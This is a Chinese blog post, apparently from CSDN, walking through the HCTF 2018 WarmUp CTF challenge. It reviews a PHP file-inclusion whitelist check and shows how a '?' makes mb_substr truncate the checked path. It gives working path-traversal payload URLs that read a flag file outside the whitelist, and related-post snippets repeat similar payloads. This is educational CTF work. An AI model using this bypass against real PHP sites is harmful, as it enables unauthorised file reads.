[HCTF 2018]WarmUp Wp

最新推荐文章于 2023-05-28 13:01:10 发布
最新推荐文章于 2023-05-28 13:01:10 发布
阅读量437 收藏
点赞数
文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53738407/article/details/122361541
版权

文章目录


在这里插入图片描述

  • 打开界面,就是这么一个比较憨的图片

我们来寻找利用点

  • 先查看源码
    在这里插入图片描述
  • 发现一个注释的source.php,看能否进入,发现点东西
  • 在这里插入图片描述
  • 一串php代码,先大概的审计一番,发现了hint.php,看能否进入,发现点东西
  • 在这里插入图片描述
  • 原来flag不在这里,在/ffffillaaaagggg中

代码分析

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>
  • 第一步当然是寻找敏感函数,发现了include,利用文件包含函数
 if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
  • 第二步当然是对这个含有include函数的一大串关键if语句进行分析
  • 可知当if(true&&true&&true)时,调用include函数
  • 第一个true! empty($_REQUEST['file']提交数据不为空即可
  • 第二个trueis_string($_REQUEST['file'])提交数据为字符串即可
  • 第三个trueemmm::checkFile($_REQUEST['file'])需要调用emmm类中的checkFile为真

细解checkFile函数

 public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }

四个if语句构成这个函数,我们知道要想让函数返回true,就必须让含有return true的if语句达成return true的条件,且前面的语句不会使在达到之前让函数执行中断

  • 第一个if语句,不能返回flase,(! isset($page) || !is_string($page)需要$page存在且为字符串,使函数继续执行

  • 第二个if语句,可以返回true,in_array($_page, $whitelist),就需要$whitelist中存在$page
    in_array— 检查数组中是否存在某个值

payload

  • payload1
http://111.198.29.45:56708/index.php?file=source.php../../../../../ffffllllaaaagggg

在这里插入图片描述
you can’t see it!
分析:说明ffffllllaaaagggg不在$whitelist数组的键值中
执行后续代码,$page会一直保持不变$_page=source.php../../../../../../../ffffllllaaaagggg
这样岂不是无解,后续返回false,条件无法达成

mb_substr() 函数返回字符串的一部分
mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置

这两个函数是非常关键的,也是为何第一个payload无解,改进payload完成绕过的原因

mb_strpos($page . '?', '?')

这个函数的意思就是先将$page与?连接,然后查找第一个?出现的位置并返回,带入mb_substr()函数中,截取等于返回值长度的字符串,第一个payload中没有?,故他无限返回都是$_page=source.php../../../../../../../ffffllllaaaagggg
因此无解

  • payload2
 http://111.198.29.45:56708/index.php?file=source.php?../../../../../../ffffllllaaaagggg

改进的payload便可返回flag
在这里插入图片描述
原因:改进的payload
$_page=source.php?../../../../../../../ffffllllaaaagggg
第二个if语句返回flase时

if (in_array($page, $whitelist)) {
                return true;
            }

进入

 $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );

便可截取到

$_page=source.php

故返回true
三条件达成
if(true&&true&&true)成立
include函数
最后执行include(source.php?../…/…/…/…/…/ffffllllaaaagggg)

Acco_30_L
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
SharePoint Warm up WSP包
05-10
SharePoint Warm up WSP包是一种专门针对SharePoint环境优化启动速度的解决方案。在SharePoint环境中,初次访问或者长时间未访问的网站集可能会因为缓存、IIS应用程序池回收等因素导致加载速度较慢。这种现象通常被...
HCTF 2018 WarmUp Wp
Luminous_song的博客
08-28 307
首先打开页面是一个滑稽的表情,直接F12看到source.php的提示 ok/source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
[wp] HCTF 2018 warmup
MercyLin的博客
02-09 1626
好久好久没做题了( 进去有个滑稽的图片,那就先看看源码,发现提示source.php,访问得知还有hint.php,得知flag在ffffllllaaaagggg 然后看了看源码,第一反应是不是编码的的绕过,但是研究了下,好像和编码绕过没啥关系,就是个套娃,套就完事了,构造payload: /?file=source.php?file=ffffllllaaaagggg 是一片空白 但是总体的思路...
[HCTF]warmup-wp
baidu_39504221的博客
11-21 241
打开只有一个滑稽,F12一下发现个source.php 记得读一下hint.php,我忘截图了… 放到url后面读一下 以下是源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"
[BUUCTF]HCTF 2018 WarmUp wp
weixin_43919144的博客
04-19 559
打开靶机后是一张滑稽的图片,按照惯例,我们F12看看源码,发现有提示:source.php 根据提示发现以下代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $white...
[HCTF 2018]WarmUp wp
zyer
06-04 226
ctf web wp
WarmUp
03-26
在IT行业中,尤其是在Web开发领域,"WarmUp"通常指的是预热或准备阶段,这可能涉及到服务器、应用程序或特定功能的初始化。在这个场景下,"WarmUp"可能是指优化CSS(Cascading Style Sheets)性能的过程,确保网页...
neo_warmup:热身 Neo4j
06-05
构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 Neo4j: org.neo4j.server.thirdparty_jaxrs_classes=...
Proyecto-Warmup
03-18
标题“Proyecto-Warmup”很可能是一个Java项目的名字,它可能是为了热身或者初始化某个复杂的开发任务而设计的。在Java编程中,"Warmup"通常指的是预热过程,这可能涉及到启动应用、加载必要的数据结构或进行性能...
csaw-ctf warmup wp
ditto的博客
01-20 697
拿到题目检查防护: 64位程序,简单的栈溢出: 程序本身有cat flag 计算下溢出点: exp如下:
BUUCTF-web warmup wp
想喝奶茶的胖大海
02-12 520
查看源码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv...
BUUCTF [HCTF 2018]WarmUp WP
weixin_52599204的博客
07-10 557
首先打开靶场环境,只有一张图片,先f12 直接看源代码 发现这里有一个source.php,直接访问 访问后得到一串源码,根据分析可以得到,这里需要进行file的传参,而且白名单里面有两个目录,先加上hint.php访问一波 访问后得到提示 flag 在ffffllllaaaagggg 里面,那么可以得知 ,我们需要对file进行传参,且要包含hint.php于是加上看一波 访问后发现不报错,也不提示,证明思路没问题,可能是目录不对,尝试访问上级目录最终访问到 发现flag...
[HCTF 2018]Warmup 详细wp
Leaf_initial的博客
04-23 279
例如 include_path 是 .,当前⼯作⽬录是 /www/,脚本中要 include ⼀个 include/a.php 并且在该⽂件中有⼀句 include “b.php”,则寻找 b.php 的顺序先是 /www/,然后是 /www/include/。最终的效果就是,将$page字符串中的URL路径部分提取出来,用于后续的处理和判断。即,当include后的文件找不到且有路径时,会沿此路径一直找,直到找到文件 即,当include后的文件找不到且有路径时,会沿此路径一直找,直到找到文件。
攻防世界warmup -wp
freerats的博客
07-17 357
打开一个笑脸。查看源代码,提示source.php,打开发现代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't
nucactf wp-warm up
shannow_123的博客
03-06 184
通过分析流量包提取出一堆n,e,c,然后一脸懵逼。。。这是个啥。。n,e每次都随机生成的啊。。。。 后来发现有两组n是一样的233333。。。(眼神不好被虐哭.jpg) Hi Alice, your N is: 2511818605280190341989157451280652137064605366138557731426228316747985337586707473688290391720...
buuctf-web-[HCTF 2018]WarmUp-wp
居上
06-22 148
[HCTF 2018]WarmUp 知识点 文件包含类题目 首先要去想,如何才能执行下面的include语句,要满足if语句中的3个条件,第三个条件主要就是分析出mb_substr函数截取之后 过程 滑稽~,直接查看源代码 提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
[HCTF 2018]WarmUp
夜幕下的灯火阑珊的博客
05-11 156
知识点 目录穿越 F12查看源码得到提示source.php,访问得到源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (!
[HCTF 2018]WarmUp1
最新发布
陈艺秋的博客
05-28 978
拿到题目后是一个滑稽的图像,通过开发者工具查看源码获得提示访问指定页面后得到一串PHP代码,接下来尝试做代码审计首先定义了一个名为emmm的类并包含了一个checkfile函数首先看到的是一个$whitelist变量,翻译过来就是白名单,我们当前是source.php对应,还有hint.php,访问后获得提示继续进行代码审计,它的作用是检查变量 $page 是否已经被设置并且是一个字符串类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Acco_30_L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值